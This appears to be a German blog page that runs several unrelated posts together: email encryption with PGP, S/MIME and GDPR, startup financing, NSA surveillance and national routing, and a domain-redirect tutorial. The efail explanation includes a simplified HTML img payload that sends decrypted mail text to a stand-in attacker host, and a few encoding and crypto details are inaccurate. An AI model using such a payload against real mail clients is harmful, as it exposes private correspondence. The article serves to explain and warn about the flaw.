Die E-Mail ist historisch

Das Medium E-Mail ist fast so alt wie das Internet selbst. Genauer gesagt wurde E-Mail 1972 implementiert und schon genutzt, als das Internet noch „Arpanet“ hieß. Zum Zeitpunkt dieses Blogartikels ist das 46 Jahre her. Warum erwähne ich das? Das Medium E-Mail wurde in seiner Struktur und grundlegenden Funktionsweise nie geändert. Es ist wichtig zu verstehen, dass die E-Mail vor 46 Jahren nicht vor die heutigen Herausforderungen gestellt war. Sicherheit, Datenschutz und diese absurde Menge an sensiblen Informationen, die über E-Mail ausgetauscht werden, sind ein modernes Problem, dem die E-Mail machtlos ausgeliefert ist. Und doch kommen wir von diesem Medium nicht weg, denn: E-Mail nutzt jeder.

Jeder könnte Ihre E-Mails gelesen haben

Die E-Mail, die Sie senden, wird so lange über verschiedene andere Computer weitergeleitet, bis sie im Postfach des Empfängers angekommen ist. Dabei verfügt die E-Mail selbst über keinen Schutz nach außen, der es verhindert, dass jeder, der diese E-Mail weiterleitet diese auch lesen kann. Natürlich werden die E-Mails nicht über die Computer von Tante Emma oder Onkel Heinz weitergeleitet, sondern über E-Mail-Server, die im globalen Netzwerk dafür eingebunden wurden. Aber dennoch kann es sich dabei um 2, 5, 10 oder auch 50 Server handeln, die Ihre E-Mails empfangen und weiterleiten und zwischen diesen zwei Tätigkeiten die E-Mail, samt all Ihrer Anhänge, lesen, indexieren, auswerten und Kopien an Dritte weitersenden. Deshalb wird die E-Mail auch als „Postkarte des Internets“ bezeichnet.

Nehmen wir an Alice sendet Bob eine E-Mail. Sie schreibt diese auf Ihrem Computer, verbindet sich mit Ihrem E-Mail-Anbieter und die E-Mail wurde gesendet. Die Verbindung von Alice Computer bis zum E-Mail-Server ihres Anbieters ist via SSL verschlüsselt. Dabei handelt es sich um die Transportverschlüsselung, die ermöglicht, dass der Transfer von Alice zu ihrem E-Mail-Anbieter sicher transferiert wird, ohne dass Dritte einsehen können, was Alice an ihren Anbieter überträgt. Schon hier begibt sich Alice in das Vertrauen ihres E-Mail-Anbieters, denn dieser kann jetzt, nachdem die E-Mail zu ihm übertragen wurde, die E-Mail vollumfänglich lesen. Alice möchte aber ihrem Anbieter vertrauen und davon ausgehen, dass dieser als seriöser Anbieter nicht ihre E-Mails lesen oder weitergeben wird.

Fahren wir fort: Ihr Anbieter ist darum bemüht die E-Mail an Bob zuzustellen. Dafür wird sie an den Anbieter von Bob adressiert zum nächstbesten Weiterleitungsserver gesendet mit der Bitte die E-Mail zu Bob zu bringen. Das Internet besteht aus Millionen solcher Weiterleitungsservern – ein vermaschtes Netzwerk. Dieser Weiterleitungsserver speichert die E-Mail und sendet sie weiter an den nächsten, damit dieser Bob die E-Mail zustellt.

Bereits ab dem ersten Weiterleitungsserver ist keine Transportverschlüsselung mehr gegeben. Die E-Mail liegt nun für die Möglichkeit des Abhörens offen. Doch das stört uns nicht so sehr wie die Tatsache, dass Alice vertrauenswürdiger E-Mail-Anbieter die E-Mail nicht an Bob, sondern an einen uns unbekannten Dritten weitergibt. Wer steckt dahinter? Ist der Anbieter des Weiterleitungsservers seriös? Sitzt er in unserem Land oder am anderen Ende der Welt? Ist dessen Server sicher gegen Hacker? Wir wissen es nicht.

[dt_quote type=“pullquote“ layout=“right“ font_size=“h4″ size=“2″]Einfach so Emails verschicken ist wie eine Postkarte zu schreiben; jeder der sie mal in der Hand hatte, weiß was drauf steht. Nur nicht mit ein paar Postbeamten, sondern weltweit, vollautomatisiert und unlöschbar.[/dt_quote]

Die E-Mail wird nun über verschiedene Server weitergeleitet. Einer von Ihnen ist der Server von Mallory, unserem „Bösewicht“. Er sitzt in seinem Sessel und beobachtet den Internetverkehr, der über seinen Server läuft, wobei er nach interessanten Daten Ausschau hält. Dabei legt er von jeder eingehenden E-Mail eine Kopie an, speichert sie auf seinen Festplatten und leitet die E-Mail direkt zum nächsten Weiterleitungsserver weiter.

Die E-Mail kommt schließlich auf dem Server von Bobs E-Mail-Anbieter an. Bob ruft diese über die sichere Verbindung via SSL von seinem Anbieter ab und ließt sie nun auf seinem Computer.

Der Versand der E-Mail kann bei jedem Versuch einen anderen Weg nehmen. Es ist daher nie gewährleistet, dass Alice E-Mails eine bestimmte Route gehen.

„Meine E-Mails sind nicht wichtig genug.“

Die Sicherheit der E-Mails wird häufig unterschätzt, weil es nicht greifbar ist. Einige Beispiele, die Ihre Vorstellungskraft anregen sollen:

  1. Identitätsdiebstahl: Sie senden Zugangsdaten zu einem Online-Shop mit E-Mail und Passwort via E-Mail. Ein Angreifer kann diese Daten mitlesen, sich mittels Ihrer Daten anmelden, Ihre dort eingegebenen Adress- und Zahlungsdaten auslesen sowie Bestellungen in Ihrem Namen an dritte Lieferanschriften – oder ggf. sogar Gutscheine digital – ausführen. Alternatives Szenario: Sie legen Ihren Reisepass in den Multifunktionsdrucker und lassen sich diesen von dort aus „bequem“ einscannen sowie via E-Mail zusenden. Diese E-Mail geht ebenso den weltweiten Weg und Ihr Reisepass liegt als Kopie verstreut auf der halben Welt. Kopien von Reisepässen werden unter anderem im „Darknet“ gehandelt, um damit eine fremde Identität vorzugeben.
  2. Social Engeneering: Sie senden eine E-Mail an Ihren Chef/Mitarbeiter mit der Bitte etwas auszuführen. Ein Angreifer kann Ihre E-Mails nutzen, um zu verstehen und zu rekonstruieren, wie in Ihrem Unternehmen miteinander kommuniziert wird. Sodann kann er E-Mails unter Ihrem Namen oder unter dem Namen Ihres Chefs/Mitarbeiters schreiben. Spitznamen, Grußformeln, Anreden oder Schreibstile können so eine Manipulation ermöglichen Dinge zu tun, die Sie für einen Fremden nicht getan hätten. Der sogenannte CEO-Fraud wird so realisiert, in der Mitarbeiter der Buchhaltung vom „Chef“ gebeten werden Überweisungen ins Ausland zu tätigen.
  3. Nachrichtenmanipulation: Da die Nachricht im Klartext bei den Servern ankommt, kann diese manipuliert weitergesendet werden. Nehmen Sie an Sie senden eine E-Mail mit Bitte um Zahlung auf Ihr Konto und der Angreifer wechselt die IBAN/BIC aus, bevor die E-Mail beim Empfänger ankommt. Es bleibt Ihre E-Mail aus Sicht des Empfängers.
  4. Angreifbar durch Hacker: Wo auch immer die E-Mail gespeichert wurde – ob bei Mallory oder einem „seriösen“ Weiterleitungsserver – so ist es für Hacker denkbar einen Weiterleitungsserver zu knacken und dort alle gespeicherten E-Mails auszulesen. So können auch noch über Jahre hinweg alte E-Mails beschafft und benutzt werden.
  5. Fehlende Anerkenntnis: Eine normale E-Mail gilt nicht als eine Nachricht, dessen Quelle nachweisbar ist. Jeder hätte diese Nachricht erfinden und zustellen können. So könnte auch jeder Ihrer E-Mail-Kommunikationspartner behaupten er habe diese E-Mail nicht gesendet.

Die Lösung: Asymetrische Kryptographie

Sie dürfen aufatmen: Sie müssen kein Ass in Mathe gewesen sein, um asymetrische Kryptographie zu nutzen. Diese Art der Verschlüsselung ermöglicht es E-Mails sicher zu versenden und alle obigen Herausforderungen zu lösen. Wie funktioniert asymetrische Kryptographie nun?

Asymetrische Kryptographie funktioniert so, dass es einen anderen Schlüssel zum Verschlüsseln als zum Entschlüsseln gibt. So kann Alice die Nachricht mittels Bobs öffentlichem Schlüssel so verschlüsseln, dass nur Bob diese Nachricht wiederum mit seinem privaten Schlüsseln öffnen kann.

Alice und Bob legen sich jeweils ein eigenes Schlüsselpaar mit einem öffentlichem sowie einem privaten Schlüssel an. Alice und Bob senden sich nun gegenseitig ihre öffentlichen Schlüssel zu. Als nächstes nimmt Alice die E-Mail und verschlüsselt sie mit ihrem eigenen privaten Schlüssel sowie Bobs öffentlichem Schlüssel. Daraus resultiert eine E-Mail die nur mit Alice oder Bobs privatem Schlüssel gelesen werden kann. Weiterhin ist damit sichergestellt, dass Alice als Absender hervorgeht. Der Angreifer, Mallory, kann die E-Mail so nicht mehr einsehen oder fälschen, da ihm die privaten Schlüssel fehlen.

Wie nutzen Sie nun Verschlüsselung in der Praxis?

Es ist unabdingbar für die verschlüsselte Kommunikation, dass Sie und Ihr Kommunikationspartner dasselbe Verschlüsselungsverfahren verwenden. In der Praxis gibt es zwei Verfahren. Vorweg: Sie sind am besten aufgestellt, wenn Sie sich mit beidem beschäftigen und bei sich integrieren:

  • [dt_quote type=“pullquote“ layout=“right“ font_size=“h4″ size=“2″]I‘m free, secure and available worldwide. Use me.[/dt_quote]PGP: Pretty Good Privacy ist auch der Grundsatz, der sich hinter der Abkürzung verbirgt. PGP ist ein kostenfreies OpenSource-Verschlüsselungsverfahren, welches dezentral fungiert. Aufgrund der Unabhängigkeit von Zentralisierungen ist PGP eine klare Empfehlung.
  • S/MIME: Das S/MIME-Konzept folgt einem offiziellen Standard und basiert auf Zertifikaten, die von offiziellen Stellen (wie Commodo, VeriSign, etc.) ausgestellt werden. Die Schlüsselvergabe sollte dabei unbedingt auf dem Rechner des Anwenders geschehen. Der Vorteil von S/MIME besteht in der breiteren Integrationsmöglichkeit in E-Mail-Programmen und Mobiltelefonen sowie in der Möglichkeit Dokumente rechtssicher schriftlich per E-Mail versenden zu können, sofern ein Zertifikat der Klasse 3 bezogen wurde.

Seit der NSA-Affären (Blogartikel aus 2014) gelten viele gängige Verschlüsselungsverfahren offiziell als nicht mehr sicher, da in verschiedenen Ebenen mutmaßlich Hintertüren eingebaut wurden, die mindestens von Geheimdiensten genutzt werden.

In der Regel integrieren sich die Verfahren nach Erstinstallation automatisiert in den Ablauf; Nachrichten werden automatisch oder per Knopfdruck ver- und entschlüsselt.

Hinweis: Bei der Verschlüsselung via PGP und S/MIME werden nur der Inhalt (mit Anhängen), nicht aber die Meta-Daten verschlüsselt. Es bleiben weiterhin öffentlich: E-Mail des Empfängers, E-Mail des Absenders, Datum der Nachricht und Betreff. Achten Sie darauf keine personenbezogenen, sensiblen Daten in den Betreff zu schreiben.

PGP und S/MIME nutzen

S/MIME: Sie benötigen hierzu als allererstes ein Zertifikat. Sie erhalten ein kostenloses Klasse 1  oder Klasse 3 Zertifikat bei Comodo oder über Anbieter wie PSW.net. Die Anbieter liefern Ihnen bei Beantragung des Zertifikats eine Anleitung zur Installation.

PGP: Als Windows-Nutzer beziehen Sie OpenPGP oder Gpg4win. Sind Sie Macintosh-Nutzer, so steht Ihnen die GPG-Suite offen. Nach Installation erstellen Sie Ihr Schlüsselpaar.

Den öffentlichen Schlüssel können Sie an Ihre Kommunikationspartner versenden oder auf Ihrer Website zum Download anbieten. So kann jeder, der mit Ihnen schon von der ersten E-Mail an verschlüsselt kommunizieren möchte, sich vorab den öffentlichen Schlüssel herunterladen. Ansonsten wird üblicherweise in der ersten E-Mail der öffentliche Schlüssel mitgesendet, sodass in einer zweiten E-Mail verschlüsselt gesendet werden kann. Die E-Mail-Programme verhalten sich hier sehr unterschiedlich. Das Apple iPhone Mail erfordert die manuelle Zertifikat-Installation bei S/MIME und läuft damit nicht ganz ohne zutun, ermöglicht jedoch von Haus aus das S/MIME-Verfahren.

Das Zertifikat oder den privaten Schlüssel auf das Mobiltelefon bekommen

Nach obiger Erläuterung werden Sie sich sicher nicht Ihre wertvollen Zertifikate und privaten Schlüssel unverschlüsselt per E-Mail selbst zusenden, um sich diese auf dem Telefon zu installieren. Ihre Kommunikation wäre damit schon noch vor Beginn kompromitiert. Kopieren Sie die Zertifikate über Ihren Computer direkt per Kabel auf das Telefon.

PGP und S/MIME wurden doch geknackt?

Nein. Im April 2018 wurde die Sicherheitslücke efail bekannt: Ein zur Ausnutzung der PGP- und S/MIME-Integration verwendetes Verfahren, das ein erhebliches Risiko für die meisten PGP und S/MIME-Nutzer darstellt. Das Protokoll PGP und S/MIME hingegen sind nach wie vor intakt. Im folgenden Beispiel einer verschlüsselten E-Mail wird der gesamte Inhalt verschlüsselt und insgesamt entpackt:

Wie funktioniert efaiI? Das Konzept von efail baut auf der Integration der E-Mail-Klienten, die verschlüsselte E-Mails automatisch entschlüsseln. Soweit gibt es nichts einzuwenden, wäre da nicht auch noch HTML. Die Kombination automatischer Entschlüsselung sowie dem Ausführen von HTML-Code macht es mittels Modifizierung der Ursprungsnachricht möglich den Inhalt der gesendeten E-Mail an den Angreifer zu übertragen.

Was braucht der Angreifer dafür? Zu erst einmal muss der Angreifer Ihre verschlüsselte E-Mail mitgeschnitten und vorliegen haben. Diese E-Mail wird nun aufgeteilt und vor als auch nach dem verschlüsselten Teil werden jeweils ein weiterer HTML-Block hinzugefügt, der eine Grafik lädt. Ein vereinfachtes Beispiel:

<img src="http://spy.mallory.com/
%%%MITPGPVERSCHLÜSSELTENACHRICHT: WZ4Ÿ&ÃÏWÃ4â2ëö∂ñàŒÆ≈Ôfll’"5ÇOæÆ®06*µ...%%%
"/>

Das Ergebnis ist, dass die Nachricht entschlüsselt und das HTML ausgeführt wird. Da die Nachricht innerhalb des Attributes „src“ einer Grafik aufgerufen wird, wandelt die E-Mail-Software diesen Text in ein URL-kodiertes Format um. Ein Leerzeichen wird zu + oder ein Zeilenumbruch zu %2C konvertiert. Die folgende Grafik wird versuchen aufgerufen zu werden.

<img src="http://spy.mallory.com/Hallo+Bob %2C%0Awir+treffen+uns+morgen+um+20+Uhr%21%0A Viele+Gr%C3%BC%C3%9Fe%0AAlice"/>

Der Angreifer kann nun auf spy.mallory.com einen „Seiten-Aufruf“ sehen, der ihm Verrät: „Hallo Bob, wir treffen uns morgen um 20 Uhr! Viele Grüße Alice„. Es ist somit allerdings notwendig, dass der Angreifer den Zugriff auf die verschlüsselte E-Mail verfügt, weiterhin Ihnen die E-Mail abgewandelt per E-Mail zustellt und Sie diese vom Angreifer abgewandelte E-Mail dann öffnen. Software-Lösungen wie GPG-Suite für Mac haben bereits an der Schließung dieser Sicherheitslücke gearbeitet.

Die Relevanz von E-Mail-Verschlüsselung für die DSGVO

Schon vorher hat das BDSG (Bundesdatenschutzgesetz) die E-Mail-Verschlüsselung empfohlen, indem personenbezogene Daten sicher zu übertragen sind. Seit der Einführung der DSGVO (Datenschutz-Grundverordnung) am 25. Mai 2018 wurden diese Richtlinien noch einmal verschärft und auf europäische Ebene gestellt. Auch wurden die Bußgelder auf ein empfindliches Maß angehoben: So sieht der Verstoß Strafen bis 20 Mio. Euro oder 4% des Jahresumsatzes (des Mutterkonzerns) vor. Die Verschlüsselung von personenbezogenen Daten wird im Artikel 32 DSGVO vorgeschrieben, was auch die E-Mail-Verschlüsselung beinhaltet.

Mit obigem Wissen, dass alle unverschlüsselten E-Mails verstreut auf Servern von Anbietern, dessen Namen wir nicht kennen, noch einen Vertrag haben, in verschiedenen Ländern der Welt gespeichert werden und Zugriff auf unsere Daten haben, kommen wir zu dem Ergebnis, dass das Versenden einer personenbezogenen E-Mail ohne Verschlüsselung im geschäftlichen Umfeld per Konzept einem Datenschutz-Verstoß gleichkommt, da grob fahrlässig, wenn nicht sogar vorsätzlich, das Kopieren, Einsehen und Analysieren – das Kompromittieren – der personenbezogenen Daten in Kauf genommen wird. Eine Transportverschlüsselung (SSL) wird im aktuellen öffentlich Rechtsverständnis häufig als ausreichend betrachtet. Dies ist allerdings auf Basis der Erläuterungen in diesem Artikel nur auf fehlendes Verständnis des tatsächlichen technischen Ablaufs zurückzuführen.

Weiterhin sind Sie sogar mittels Artikel 33 und Artikel 34 der DSGVO verpflichtet Datenschutzverletzungen der Aufsichtsbehörde zu melden. Manche Rechtsauffassungen gehen hier auseinander und sagen, dass kein Eigenverschulden stattgefunden hat, da sich ein Angreifer illegal Zugriff auf die Daten beschaffen müsste. Das kann aufgrund der Netzwerkstruktur nicht einmal bestätigt werden, denn Gesetze sind in jedem Land anders. Der Geheimdienst der USA, die NSA, verfügt mit PRISM über Systeme allen Datenverkehr aufzuzeichnen, der mit ihnen in Berührung kommt. Der Zugriff ist in diesem Fall auf amerikanischem Raum legal, aber nicht auf Deutschem. Doch darum geht es bei der DSGVO nicht, denn Sie müssen verhindern, dass es überhaupt möglich ist, dass personenbezogene Daten verarbeitet werden könnten. Ähnliche Aktivitäten sind übrigens auch beim britischen GCHQ zu finden.

Fazit

E-Mails transportieren viel zu wichtige Daten, als Sie unverschlüsselt zu versenden. Hacker können Sie einsehen, verkaufen oder gegen Sie verwenden und sie sind nicht rechtens im Rahmen der DSGVO. Die einzige Lösung hierzu stellt die Verschlüsselung der E-Mail dar. Es ist wichtig jeden Geschäftspartner von der E-Mail-Verschlüsselung zu überzeugen, damit wir eine genauso große Marktreichweite der Verschlüsselungsverfahren für E-Mail erreichen wie für die E-Mail selbst. Bleiben Sie dran!

Laden Sie hier unseren PGP-Schlüssel oder mein persönliches öffentliches S/MIME-Zertifikat.

So oder ähnlich heißt ein Satz, der nicht nur uns und unseren Kunden schon das ein oder andere Mal durch den Kopf gegangen ist.

So kann gerade in den ersten Jahren der Unternehmensgründung der Kapitalbedarf meist noch nicht vollständig durch den Cash Flow des Unternehmens gedeckt werden. Der findige Unternehmen muss sich daher auf die Suche nach passenden Finanzierungsmöglichkeiten und Investoren machen. Dabei ist es entscheidend für die jeweilige Entwicklungsphase die passende Finanzierungsform zu finden.

Nachfolgend werden wir die typischen Lebensabschnitte eines Start-ups und die jeweiligen Investitionsphasen betrachten. Je nach Phase bieten sich unterschiedliche Finanzierungsmodelle für den Jungunternehmer an.

I Seed-Phase

An der Schwelle zur Gründung, in der Seed-Phase, ist der Kapitalbedarf noch vergleichsweise niedrig. Geld wird hier vor allem für die Entwicklung der Geschäftsidee gebraucht. Die Höhe des Kapitalbedarfs ist jedoch entscheidend vom Unternehmenstyp abhängig.

Bei der Finanzierung wird wesentlich zwischen Eigen- und Fremdkapital unterschieden. Am Anfang muss ein Unternehmen vor allem an Eigenkapital gelangen bevor es an Fremdkapital, wie etwa in Form von Krediten, denken kann.

Bei den weniger forschungsintensiven Vorhaben wird zu Beginn das nötige Startkapital meist durch den Entrepreneur selbst bzw. Familie und Freunde bereitgestellt. Aber auch die öffentliche Programme wie „ERP-Kapital für Gründung“, „ERP-Gründerkredit – StartGeld“ oder ERP-Gründerkredit – Universell kommen unter Umständen schon in Frage. Auf Landesebene organisiert, lohnt sich auch die Existenzgründungsberatung.

Bei forschungsintensiven Vorhaben kommen vor allem öffentliche Zuschüsse oder etwa Gelder in Frage. Auch das Förderprogramm EXIST, ein Programm des Bundesministeriums für Wirtschaft und Energie (BMWi), ist für forschungsintensive Gründer von Bedeutung.

Von Bedeutung sind in dieser Phase auch schon die Business Angels. Häufig handelt es sich hierbei um erfahrene Unternehmer und Manager die sich nicht nur finanziell am Unternehmen beteiligen sondern auch ihre Erfahrungen und Kontakte einbringen können.

Für die notwendige kostengünstige Infrastruktur sorgen außerdem Gründerzentren beziehungsweise Inkubatoren wie zum Beispiel Y-Combinator (Berlin) oder auch regionale Inkubatoren wie Startplatz (Köln).

Grundsätzlich gilt jedoch, dass in dieser Phase die Kapitalbeschaffung, ob Eigen- oder Fremdkapital, noch relativ schwierig ist da das Risiko als relativ hoch eingeschätzt wird. Daher gilt: Je sorgfältiger geplant und dokumentiert das Vorhaben (Stichwort: Businessplan), desto besser können potentielle Geldgeber überzeugt werden (Elevator Pitch).

Auch können manche Crowdfunding Plattformen eine Kapitalbasis schaffen. An dieser Stelle ist insbesondere Startnext.de zu nennen, die erste deutsche Crowdfunding-Plattform,

Auch Leasing kann eine Option sein um die Eigenkapitalbasis zu schonen.

II Start-Up-Phase

Steht die Idee fest und ein erstes Konzept liegt auf dem Tisch geht es in die Start-up-Phase. Hier geht es darum ein marktreifen Produkt- beziehungsweise Dienstleistungsangebot zu erstellen. Das Unternehmen wird damit offiziell gegründet. Für die weitere Gewinnung von Geldern geht es nun darum das Konzept weiter auszubauen und einen ausgereifteren Finanzplan aufzustellen.

Grundsätzlich wird hinsichtlich der Finanzierung zwischen Innen- und Außenfinanzierung unterschieden. Die Innenfinanzierung wird aus dem laufenden Geschäftsbetrieb bestritten und ist meist weniger umfangreich. Wesentlich bedeutender ist daher die Außenfinanzierung die sich auf Eigen- und Fremdkapital sowie hybride Formen stützt. Da das Risiko immer noch vergleichsweise hoch ist, kommt es vor allem auf Eigenkapital an. Diese Basis gilt es zudem entscheidend zu verbessern, wenn Fremdkapital angezogen werden möchte.

Die Förderungsprogramme auf Stadt- und Landesebene konzentrieren sich vor allem auf Realtransfers wie die Bereitstellung von Infrastruktur, Beratung und Gründercoaching während jene auf Bundesebene stärker die Finanzierung, in Form von Bürgschaften oder Eigenkapital-Hilfe- und -Beteiligungs-Programmen, fokussieren. Der schon eingangs erwähnten Kreditanstalt für Wiederaufbau und ihren Programmen kommt eine herausragende Bedeutung zu, genauso wie dem High-Tech-Gründerfond, der Anteile am Unternehmen erhält.

Neben Finanzierungsprogrammen und Realleistungen stehen hier auch nicht-staatliche Stellen wie Venture Capital-Gesellschaften zur Verfügung. Diese wirken über Anteilsrechte, entweder aktiv oder still, mit. Es sollte allerdings auch beachtet werden, dass mit der Beteiligung von Venture Capital auch Fremdbestimmung einhergeht.

Auch Crowdfunding, eine Form der Beteiligungsfinanzierung, soll an dieser Stelle nicht unerwähnt bleiben. Plattformen geben Entrepreneurn die Möglichkeit ihre Projekte vorzustellen um diese mit der direkten Hilfe von vielen Menschen zu unterstützen. Außerdem einen Blick Wert: Seedmatch und Companisto.

III Emerging-Growth-Phase

Nach der Gründungsphase, dem Abschluss der Seed- und Start-up-Phase, sind die Erfolgsaussichten für das Unternehmen besser absehbar. Sind diese gut, muss das Unternehmen nun versuchen möglichst schnell eine kritische Größe zu erreichen um nachhaltig Gewinn zu erzielen. In dieser Phase steigt der Kapitalbedarf zwar signifikant, das Erreichen der Gewinnschwelle erleichtert jedoch auch den Zugang zur Fremdfinanzierung.

In diesem Lebensabschnitt kommt insbesondere dem Beteiligungskapital, wie in Form von Venture Capital, eine besondere Bedeutung zu. Da neben der Kapitalleistung auch oft Managementleistungen bzw. ein Wissens- und Informationstransfer mit der Beteiligung einhergeht spricht man daher auch vom sogenannten „Smart Money“. Wie zuvor schon angesprochen, ist die Beteiligung allerdings auch mit Informations-, Kontroll- und Mitbestimmungsrechten verbunden und dem Unternehmer daher bewusst sein bei der Entscheidungsfindung für eine Venture-Capital-Gesellschaft. Auf der anderen Seite sollte bei der Wahl angestrebt werden, dass dieser nicht nur als reiner Kapitalgeber fungiert sondern vielmehr die Stellung eines Gründungspartners inne hat.

Datenschutz quo vadis

Bald ist es wieder soweit: Am 11. November findet das Cyber Security Summit statt. Gemeinsam mit der Münchener Sicherheitskonferenz veranstaltet die Telekom bereits zum dritten Mal diese Veranstaltung mit der Zielsetzung Impulse für einen innovativen und sicheren Wirtschaftsstandort Deutschland zu setzen. Das Ganze basierend auf der Feststellung, dass moderne Informations- und Kommunikationsinfrastrukturen sich immer mehr zu einem Standortvorteil im internationalen Wettbewerb entwickeln.

Vor dem Hintergrund des Datenskandals, der jüngst durch das Abhören des kanzlerischen Mobiltelefons wieder aufgeflammt ist, fragt man sich allerdings, erneut, wie sicher dieser Standort überhaupt noch ist und inwiefern man überhaupt vorteilhafter gestellt ist als andere Nationen.

Nationales Routing als Lösung?

Vielleicht auch nicht ganz unbeabsichtigt, machte die Telekom vor Kurzem aufmerksamkeitsstark von sich reden als sie den Vorschlag einbrachte in Deutschland ein nationales Routing einzuführen. Bekannt gemacht über Wirtschaftswoche und Rheinische Post lautet die Idee den deutschen Internetverkehr innerhalb der Landesgrenzen zu belassen bzw. zu routen und damit nicht mehr über das Ausland zu leiten. Ziel ist es, dass dieser nicht mehr von beliebigen Geheimdiensten mitgeschnitten werden kann.

Aber was brächte uns das eigentlich und ist das Ganze nicht eher als aufmerksamkeitsstarke Schnapsidee abzutun wo doch der Summit von den Rheinländern für den 11. im 11. vorgesehen ist: Traditionell der Startschuss in die jecke Session am Rhein.

Zukunftsmusik oder Rückschritt 

Auf netzpolitik.org, dem Leitmedium der digitalen Welt, wird das Ganze nicht ganz als Schnellschuss abgetan und einige Argumente ausgelotet die dafür sprechen. Aus politischer Sicht nicht ganz neu, sehen die Verantwortlichen von netzpolitik vor allem eine Herausforderung was die Technik betrifft.  So müssten im Idealfall viele Provider mitmachen und man weiß nicht immer, wo genau eine IP ihren Standort hat.

Die Alarmglocken schrillen laut netzpolitik vor allem bei dem Gedanken an eine sogenannte Balkanisierung auf die einen unweigerlich an Länder wie Iran, Russland und China denken lässt. Diese haben, aus unserer Sicht, mehr als das Datenwohl des Einzelnen, vielmehr im Sinne ihre „Zensurinfrastrukturen“ zu verbessern. Sicherlich ist der Gedanke auch nicht zu weit entfernt anzunehmen, dass auch diese Länder damit beabsichtigen sich vor der Datenkracke der NSA schützen zu wollen.  Das Balkanisierungsargument hebelt sich allerdings von selbst aus, wenn man bedenkt, dass es nur um den innerdeutschen Traffic geht, um bei dem Zugriff auf US-Server wieder die Anderen mitlesen können.

Politisch war das Ganze bereits einmal vor etwas mehr als 10 auf dem Tisch. Allein das Problembewusstsein war damals noch nicht vorhanden. Heute sieht dies allerdings anders aus. So hat ein Ausschuss des EU-Parlaments jüngst für den Entwurf einer Datenschutzreform gestimmt. Erklärtes Ziel ist es den Datenschutz in Europa mit einheitlichen Regeln zu versehen und somit die Datenweitergabe an Drittstaaten wie die USA künftig nur auf Grundlage von EU-Recht zu ermöglichen. Bis die Verhandlungen zwischen Mitgliedsstaaten und der EU-Kommission allerdings abgeschlossen sind, kann es noch bis Mitte 2014 dauern.

Da die EU-Mühlen bekanntlich langsam mahlen, wollen wir an dieser Stelle unseren Lesern nochmal ein paar Tipps an Herz legen zum Thema Datenschutz und –aufbewahrung:

Als eine der ersten Vorschläge kursierte im Netz der Tipp statt dem Betriebssystem Windows oder OS X besser zu Linux zu wechseln. Allerdings gibt es bisher noch keinen Hinweis darauf, dass sich die NSA oder besser gesagt Prism auf dem PC  mehr oder weniger gut als auf Mac oder Linux einnisten können. So gibt es auch bisher keine Hinweise darauf, dass Windows oder etwa OS X Nutzerdaten filtern.

Nicht uninteressant war dagegen die Idee die IP-Adresse mittels eines Services, der sich bezeichnenderweise Tor nennt, zu verschleiern. Mittels Tor wird die IP-Adresse als auch verschleiert woher der Nutzer kommt. Tor ist ein Netzwerk von Benutzern, die Ihren Datenverkehr über verschiedene andere Mitglieder des Tor-Netzwerks in Teilen beziehen. Ziel ist es, erst einmal keine konkrete Person hinter einer Suchanfrage oder Website-Besuch zu identifizieren. Jedoch ist auch das Tor Netzwerk umgehbar, insbesondere für die NSA.

Vor allem aber wird eine eine höhere Datensicherheit durch die Verschlüsselung selbiger erstrebt. Die Verschlüsselung wird von der Zeit gar als Bürgerpflicht eingestuft. Die Verschlüsselung betrifft dabei zu allererst die Web-Verschlüsselung. So wird explizit empfohlen Verbindungen über das SSL-Protokoll zu verwenden. Aber auch das ist für die NSA kein Problem. Die technologische Vielfalt geht sogar soweit, dass Ihr Passwort gehört werden kann, abhängig durch die Hochfrequenzgeräusche Ihres Prozessors.

Der beste Rat ist eigene Verschlüsselungstechniken wie PGP zu verwenden. Es wird zudem nahegelegt E-Mails mittels Tools wie Gpg4win zu verschlüsseln sodass nur der Empfänger die Nachricht lesen kann. Achten Sie jedoch darauf, welches PGP Sie benutzen. Denn die Sicherheit ist bei den neuen Versionen nicht mehr immer gewährleistet. Für den sicheren Datenaustausch wird die ZIP-Archivierung empfohlen die mit Hilfe von kostenlosen Tools wie 7Zip möglich ist. Für den Datenschutz in Online-Ordnern empfiehlt sich dagegen ein Tool wie der Boxcrypter. Aber was passiert, wenn die NSA denn etwas mal wirklich nicht lesen kann? Sie werden neugierig. Es ist uns allen noch gar nicht bewusst, wo dies hinführen wird.

Ein abschließender Rat der für die meisten von uns nur schwerlich umzusetzen sein wird betrifft die Datenenthaltsamkeit: So verspricht das schlichte nicht weitergeben von Daten via sozialen Netzwerken bzw. das Entsagen von US-amerikanischen Services wie Facebook & Co.  immer noch den besten Schutz vor unerwünschtem Ausspähen. Es geht aber noch weiter: Machen Sie sich rar. Denn wie WhatsApp es vormacht, senden Ihre Freunde jeden Tag das gesamte Adressbuch inklusive aller Notizen Ihrer Person auf Server in Amerika hoch, von denen letztlich auch der Geheimdienst profiert.

Wenn Ihre Domain umgezogen ist, benötigen Sie meist eine Weiterleitung um die Besucher der alten Seiten aufzufangen. Hierfür gibt es drei Varianten, welche Ihnen auf ganz unterschiedliche Weise die Wege öffnen. Eine Übersicht des Themas:

Der Header-Redirect ist der empfehlenswerteste Redirect, den Sie anwenden können. Er wird auch von Suchmaschinen wie Google empfohlen und stellt auch den seriösesten Eindruck dar, da er nicht wie der Frame-Redirect die Herkunft der Seite “verschleiert”. Es gibt mehrere Methoden für einen Header-Redirect:

  • in der .htaccess
  • per PHP-Header
  • mod_rewrite

Variante .htaccess

Wir nehmen an www.domain-A.de soll auf www.domain-B.de weitergeleitet werden. Variante .htaccess Wir legen auf www.domain-A.de eine Datei namens .htaccess an. In Windows-Systemen kann man diese nicht aus dem Explorer anlegen, daher können wir diese auch anders nennen und auf dem Server umbenennen. In diese .htaccess schreiben wir Folgendes:

Redirect permanent / http://www.domain-B.de/

Damit wird jede Anfrage die auf / gelangt (also JEDE Anfrage auf die Domain) an www.domain-B.de weitergeleitet. Das “permanent” bewirkt einen 301er Redirect. Wäre dies nicht der Fall wäre würde ein 302er Redirect eingesetzt.

Variante php-header

Man kann den Redirect ebenfalls in PHP steuern lassen, um so beispielsweise abzufragen welche Sprache der Besucher spricht und diesen entsprechend weiterleiten zu lassen.

<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: http://www.domain-B.de/");
header("Connection: close");
?>

Variante per mod_rewrite

Sofern mod_rewrite auf dem Server aktiviert ist, kann man auch die Version mit mod_rewrite einsetzen:

RewriteEngine On
RewriteRule ^(.*)\.html$ http://www.domain-B.de/$1.html[R=301,L]

Prüfen der Weiterleitungsart

